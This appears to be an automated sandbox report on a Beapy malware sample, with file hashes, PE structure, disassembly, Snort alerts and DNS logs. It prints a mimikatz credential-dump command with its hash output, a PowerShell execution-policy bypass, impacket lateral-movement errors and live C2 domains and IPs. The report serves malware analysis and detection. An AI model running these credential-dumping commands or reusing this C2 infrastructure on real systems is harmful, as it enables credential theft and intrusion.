                                                              Preview: .. .#####. mimikatz 2.1.1 (x64) built on Aug 3 2018 17:05:14 - lil!.. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo).. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ).. ## \ / ## > http://blog.gentilkiwi.com/mimikatz.. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ).. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/....mimikatz(powershell) # sekurlsa::logonpasswords....Authentication Id : 0 ; 102590 (00000000:000190be)..Session : Interactive from 1..User Name : user..Domain : computer..Logon Server : computer..Logon Time : 9/30/2020 8:02:40 AM..SID : S-1-5-21-3853321935-2125563209-4053062332-1002...msv :.... [00000003] Primary... * Username : user... * Domain : computer... * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0... * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709...tspkg :....wdigest :.... * Username : user... * Domai
                                                              C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):5042
                                                              Entropy (8bit):5.155944530171988
                                                              Encrypted:false
                                                              SSDEEP:96:BZMhKN74qDo1Z4JCBnlmLnq0nq53oLoK0oK74ALGARBLGA0GK6LEDLGAqXNEmLGS:79WnlAnq0nq5WoK0oK7VGArGA0GK6LEC
                                                              MD5:361400D376674D699C29CC97BCE44853
                                                              SHA1:1F76E905BCA5952820427F1C6BFE6E17556A4ED4
                                                              SHA-256:2CDD8FFD0F7FCA3AD3154F167C264BF99DF8AC3073A0973B84398D83F7D0D3E8
                                                              SHA-512:97A34D034B3D329AEF5EE5E3CFFEC944EB876E19A66273E14C95991AA316DF654BB0D24B8082EE5769F6B48E21A2E4550ACE99897BAF813E812182D6655BD91D
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt, Author: Florian Roth
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210405112312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass import-module C:\Users\user\Desktop\m2.ps1..Process ID: 6964..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210405112312..**********************..PS>import-module C:\Users\user\Desktop\m2.ps1... .#####. mimikatz 2.1.1 (x64) built on Aug 3 2018 17:05:14 - lil!. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo). ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ). ## \ / ## > h
                                                              \Device\ConDrv
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):363
                                                              Entropy (8bit):5.1610162737161644
                                                              Encrypted:false
                                                              SSDEEP:6:kfl3Fy7tbOhbVnKXVbUIbUybWyErAgIT8FcfW12ExD8FcUy1sb:k93FibOvnKFbfbnbWy1Yeu1jxoeUy1sb
                                                              MD5:9AE9ADC3BA89E853DC6E1A6FF142E58F
                                                              SHA1:B70D41D74A431484182BDB924FF1CF0C2550B0DE
                                                              SHA-256:31EF3745545E8669B1EC525B0E0991AD7B4945F61BCC4B66D067DBD49977E11F
                                                              SHA-512:BA7769469BB99832497267B671EB02590A2EC45124DDD469FDBA2D78C9E1506BE14AECFBA019C67911168DB41C5197DC7B5BFEB7585829413081B2D56DDB041C
                                                              Malicious:false
                                                              Preview: reload mimi..nobody logon..mimi over..start scan..192.168.0.1/24..192.168.1.1/24..192.168.2.1/24..exp IP:192.168.2.1exp IP:192.168.2.3....CRITICAL:impacket:Authenticated as Guest. Aborting..CRITICAL:impacket:Error uploading file temp\svchost.exe, aborting.......aaa..CRITICAL:impacket:Error uploading file windows\temp\svchost.exe, aborting.......192.168.3.1/24..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.993490491074095
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:UlJpFEz1Cj.exe
                                                              File size:6967362
                                                              MD5:dde978f310f46d0556ea774da695b698
                                                              SHA1:e22548f91b17d4f4fc38dfe1b90ea71b1a2bfed1
                                                              SHA256:0bc20b98a473491219885cc68d0f0944563260ae12add1b1199e64255e92c40d
                                                              SHA512:c5c519c7102eaae7acc0692a3541fcb6d504fdaf9a333d2c8b170ff7222b01bd5507ecc9c5c7872c91efa8958cacf03008c58a30771f13c0d7857f20a68c8b5c
                                                              SSDEEP:196608:eAqjTpnhXlmyWCZNulPKQ8hY/Bkr/fOIT/+VdlBFKazR:kfauN/HYOSIT/EVF9d
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@..b.Q.b.Q.b.Q...Q.b.Q...Q.b.Q...Q.b.Q.<-P.b.Q.<+P.b.Q.<*P.b.Q{..Q.b.Q.b/Q.b.Q4<*P.b.Q4<.Q.b.Q4<,P.b.QRich.b.Q...............

                                                              File Icon

                                                              Icon Hash:ae9ebc4c8ce0e8f8

                                                              General

                                                              Entrypoint:0x40779a
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows cui
                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x5B8E99C5 [Tue Sep 4 14:42:13 2018 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:4df47bd79d7fe79953651a03293f0e8f
                                                              Signature Valid:
                                                              Signature Issuer:
                                                              Signature Validation Error:
                                                              Error Number:
                                                              Not Before, Not After
                                                                Subject Chain
                                                                  Version:
                                                                  Thumbprint MD5:
                                                                  Thumbprint SHA-1:
                                                                  Thumbprint SHA-256:
                                                                  Serial:
                                                                  Instruction
                                                                  call 00007F7A58E28734h
                                                                  jmp 00007F7A58E2807Ch
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  push ebx
                                                                  xor edi, edi
                                                                  mov eax, dword ptr [esp+14h]
                                                                  or eax, eax
                                                                  jnl 00007F7A58E28206h
                                                                  inc edi
                                                                  mov edx, dword ptr [esp+10h]
                                                                  neg eax
                                                                  neg edx
                                                                  sbb eax, 00000000h
                                                                  mov dword ptr [esp+14h], eax
                                                                  mov dword ptr [esp+10h], edx
                                                                  mov eax, dword ptr [esp+1Ch]
                                                                  or eax, eax
                                                                  jnl 00007F7A58E28206h
                                                                  inc edi
                                                                  mov edx, dword ptr [esp+18h]
                                                                  neg eax
                                                                  neg edx
                                                                  sbb eax, 00000000h
                                                                  mov dword ptr [esp+1Ch], eax
                                                                  mov dword ptr [esp+18h], edx
                                                                  or eax, eax
                                                                  jne 00007F7A58E2820Ah
                                                                  mov ecx, dword ptr [esp+18h]
                                                                  mov eax, dword ptr [esp+14h]
                                                                  xor edx, edx
                                                                  div ecx
                                                                  mov ebx, eax
                                                                  mov eax, dword ptr [esp+10h]
                                                                  div ecx
                                                                  mov edx, ebx
                                                                  jmp 00007F7A58E28233h
                                                                  mov ebx, eax
                                                                  mov ecx, dword ptr [esp+18h]
                                                                  mov edx, dword ptr [esp+14h]
                                                                  mov eax, dword ptr [esp+10h]
                                                                  shr ebx, 1
                                                                  rcr ecx, 1
                                                                  shr edx, 1
                                                                  rcr eax, 1
                                                                  or ebx, ebx
                                                                  jne 00007F7A58E281E6h
                                                                  div ecx
                                                                  mov esi, eax
                                                                  mul dword ptr [esp+1Ch]
                                                                  mov ecx, eax
                                                                  mov eax, dword ptr [esp+18h]
                                                                  mul esi
                                                                  add edx, ecx
                                                                  jc 00007F7A58E28200h
                                                                  cmp edx, dword ptr [esp+14h]
                                                                  jnbe 00007F7A58E281FAh
                                                                  jc 00007F7A58E281F9h
                                                                  cmp eax, dword ptr [esp+10h]
                                                                  jbe 00007F7A58E281F3h
                                                                  dec esi
                                                                  xor edx, edx
                                                                  mov eax, esi
                                                                  dec edi
                                                                  jne 00007F7A58E281F9h
                                                                  neg edx
                                                                  neg eax
                                                                  sbb edx, 00000000h
                                                                  pop ebx
                                                                  pop esi
                                                                  pop edi
                                                                  retn 0010h
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push 00000000h
                                                                  call dword ptr [00000058h]
                                                                  Programming Language:
                                                                  • [RES] VS2015 UPD3 build 24213
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b82c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3d000 | 0xea38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6a4030 | 0xeb0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4c000 | 0x17b8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2ae40 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ae60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x21000 | 0x180 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1f224 | 0x1f400 | False | 0.569703125 | MPEG-4 LOAS | 6.65268604007 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x21000 | 0xb0ec | 0xb200 | False | 0.562368328652 | data | 6.10090706211 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2d000 | 0xe680 | 0xa00 | False | 0.149609375 | data | 1.94097514115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids | 0x3c000 | 0xb8 | 0x200 | False | 0.302734375 | data | 1.89005657537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3d000 | 0xea38 | 0xec00 | False | 0.802105402542 | data | 7.29706120507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4c000 | 0x17b8 | 0x1800 | False | 0.805826822917 | data | 6.6508798335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3d1c0 | 0xea8 | data | |
RT_ICON | 0x3e068 | 0x8a8 | data | |
RT_ICON | 0x3e910 | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x3ee78 | 0x909b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x47f18 | 0x25a8 | data | |
RT_ICON | 0x4a4c0 | 0x10a8 | data | |
RT_ICON | 0x4b568 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x4b9d0 | 0x68 | data | |

DLL | Import
KERNEL32.dll | GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, LoadLibraryExW, GetShortPathNameW, FormatMessageW, LoadLibraryA, MultiByteToWideChar, WideCharToMultiByte, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetCommandLineA, ReadFile, CreateFileW, GetDriveTypeW, GetFileType, CloseHandle, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, GetFullPathNameA, CreateDirectoryW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleCP, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableA, GetFileAttributesExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, GetProcessHeap, WriteConsoleW, GetTimeZoneInformation, HeapSize, HeapReAlloc, SetEndOfFile, RaiseException
WS2_32.dll | ntohl

                                                                  Network Behavior

                                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/05/21-11:24:49.333871 | UDP | 2029058 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 50713 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:49.333871 | UDP | 2029057 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 50713 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:50.606319 | UDP | 2029056 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 58987 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:50.817349 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 49743 | 80 | 192.168.2.3 | 72.52.178.23
04/05/21-11:24:51.279850 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 49746 | 80 | 192.168.2.3 | 173.231.189.15
04/05/21-11:24:51.679560 | UDP | 2029058 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 64938 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:51.679560 | UDP | 2029057 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 64938 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:52.908774 | UDP | 2029056 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 64910 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:53.023235 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:24:53.128604 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 49881 | 80 | 192.168.2.3 | 72.52.178.23
04/05/21-11:24:53.487926 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 50005 | 80 | 192.168.2.3 | 173.231.189.15
04/05/21-11:24:53.783640 | UDP | 2029058 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 56130 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:53.783640 | UDP | 2029057 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 56130 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:54.862765 | UDP | 2029056 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 56338 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:55.111430 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 50366 | 80 | 192.168.2.3 | 72.52.178.23
04/05/21-11:24:55.529436 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:24:55.574418 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 50490 | 80 | 192.168.2.3 | 173.231.189.15
04/05/21-11:24:55.869952 | UDP | 2029058 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 58784 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:55.869952 | UDP | 2029057 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 58784 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:56.031255 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:24:58.338210 | UDP | 2029056 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 63978 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:58.550501 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 50919 | 80 | 192.168.2.3 | 72.52.178.23
04/05/21-11:24:58.959186 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 50993 | 80 | 192.168.2.3 | 173.231.189.15
04/05/21-11:24:59.292835 | UDP | 2029058 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 55708 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:24:59.292835 | UDP | 2029057 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 55708 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:25:00.380859 | UDP | 2029056 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 56803 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:25:00.785960 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 51350 | 80 | 192.168.2.3 | 72.52.178.23
04/05/21-11:25:01.451047 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 51384 | 80 | 192.168.2.3 | 173.231.189.15
04/05/21-11:25:01.757683 | UDP | 2029058 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 55359 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:25:01.757683 | UDP | 2029057 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 55359 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:25:01.813629 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 55359 | 8.8.8.8 | 192.168.2.3
04/05/21-11:25:02.576675 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:03.063101 | UDP | 2029056 | ET TROJAN Win32/Beapy CnC Domain in DNS Lookup | 58306 | 53 | 192.168.2.3 | 8.8.8.8
04/05/21-11:25:03.288067 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 51772 | 80 | 192.168.2.3 | 72.52.178.23
04/05/21-11:25:03.581136 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:04.690469 | TCP | 2027149 | ET TROJAN Py/Beapy CnC Checkin | 51981 | 80 | 192.168.2.3 | 173.231.189.15
04/05/21-11:25:07.607306 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:11.625239 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:13.642352 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:17.666842 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:18.677057 | ICMP | 401 | ICMP Destination Unreachable Network Unreachable | | | 149.11.89.129 | 192.168.2.3
04/05/21-11:25:32.822281 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:32.822308 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:32.822325 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:32.822335 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:32.822348 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:32.822359 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:33.838811 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:34.848817 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:34.848856 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:35.838762 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:36.852461 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3
04/05/21-11:25:37.865443 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.203.17.1 | 192.168.2.3

                                                                  Network Port Distribution

                                                                  • Total Packets: 86
                                                                  • 443 (HTTPS)
                                                                  • 80 (HTTP)
                                                                  • 53 (DNS)
                                                                  Apr 5, 2021 11:23:30.239722967 CEST5436653192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:30.314647913 CEST53543668.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:46.501765013 CEST5303453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:46.519735098 CEST5776253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:46.548104048 CEST53530348.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:46.573817015 CEST53577628.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:42.737785101 CEST5543553192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:42.793589115 CEST53554358.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:49.333870888 CEST5071353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:49.428086996 CEST53507138.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.429013014 CEST5613253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:50.480840921 CEST53561328.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.606318951 CEST5898753192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:50.660466909 CEST53589878.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.666121960 CEST5657953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:50.722232103 CEST53565798.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.978039026 CEST6063353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.015222073 CEST6129253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.069844961 CEST53612928.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.119930029 CEST53606338.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.129632950 CEST6361953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.183566093 CEST53636198.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.679559946 CEST6493853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.730968952 CEST6194653192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.738825083 CEST53649388.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.787220955 CEST53619468.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:52.908773899 CEST6491053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:52.966620922 CEST53649108.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:53.295975924 CEST5212353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:53.350553989 CEST53521238.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:53.783639908 CEST5613053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:53.842984915 CEST53561308.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:54.862765074 CEST5633853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:54.935036898 CEST53563388.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:55.272763968 CEST5942053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:55.418486118 CEST53594208.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:55.869951963 CEST5878453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:55.921319008 CEST53587848.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:58.338210106 CEST6397853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:58.392496109 CEST53639788.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:58.716615915 CEST6293853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:58.770958900 CEST53629388.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:59.292834997 CEST5570853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:59.349452972 CEST53557088.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:00.380858898 CEST5680353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:00.541034937 CEST53568038.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:01.243465900 CEST5714553192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:01.300173998 CEST53571458.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:01.757683039 CEST5535953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:01.813628912 CEST53553598.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:03.063101053 CEST5830653192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:03.117399931 CEST53583068.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:04.465533972 CEST6412453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:04.514276981 CEST53641248.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:08.219528913 CEST4936153192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:08.292540073 CEST53493618.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:29.181730032 CEST6315053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:29.238317966 CEST53631508.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:29.737430096 CEST5327953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:29.799674034 CEST53532798.8.8.8192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 5, 2021 11:24:49.333870888 CEST | 192.168.2.3 | 8.8.8.8 | 0xc6cd | Standard query (0) | info.ackng.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.429013014 CEST | 192.168.2.3 | 8.8.8.8 | 0xcd26 | Standard query (0) | ip.42.pl | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.606318951 CEST | 192.168.2.3 | 8.8.8.8 | 0xc903 | Standard query (0) | info.beahh.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.666121960 CEST | 192.168.2.3 | 8.8.8.8 | 0xbc17 | Standard query (0) | jsonip.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.978039026 CEST | 192.168.2.3 | 8.8.8.8 | 0x6932 | Standard query (0) | info.abbny.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:51.129632950 CEST | 192.168.2.3 | 8.8.8.8 | 0xa295 | Standard query (0) | jsonip.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:51.679559946 CEST | 192.168.2.3 | 8.8.8.8 | 0xc2f3 | Standard query (0) | info.ackng.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:52.908773899 CEST | 192.168.2.3 | 8.8.8.8 | 0x81df | Standard query (0) | info.beahh.com | A (IP address) | IN (0x0001)
